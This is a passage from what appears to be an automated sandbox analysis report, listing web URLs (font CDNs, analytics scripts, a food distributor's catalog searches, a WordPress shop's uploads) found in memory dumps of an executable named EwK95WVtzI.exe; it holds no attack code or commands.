                Source: EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1998090500.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                Source: EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1998090500.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1979753685.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2016023377.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2273309913.0000000003F50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?520556228c0113270c0c772027905838
                Source: EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://inhouse.pohlfood.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://js.datadome.co/tags.js
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1388843234.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1388843234.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                Source: EwK95WVtzI.exe, 00000000.00000003.2362049837.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://namebright.com
                Source: EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/catalog?view=class&limit=200
                Source: EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?offset=0&limit=250&col=class&dir=ASC&term
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=byclass&queryCol=&terms=pizza
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&queryCol=class&terms=Mediterran
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&queryCol=class&terms=mexican
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/respond/1.4.2/respond.min.js
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/cart/request-quote/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/about-300x298.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/woocommerce_uploads/logo-sdw6o6.gif
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1388843234.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, 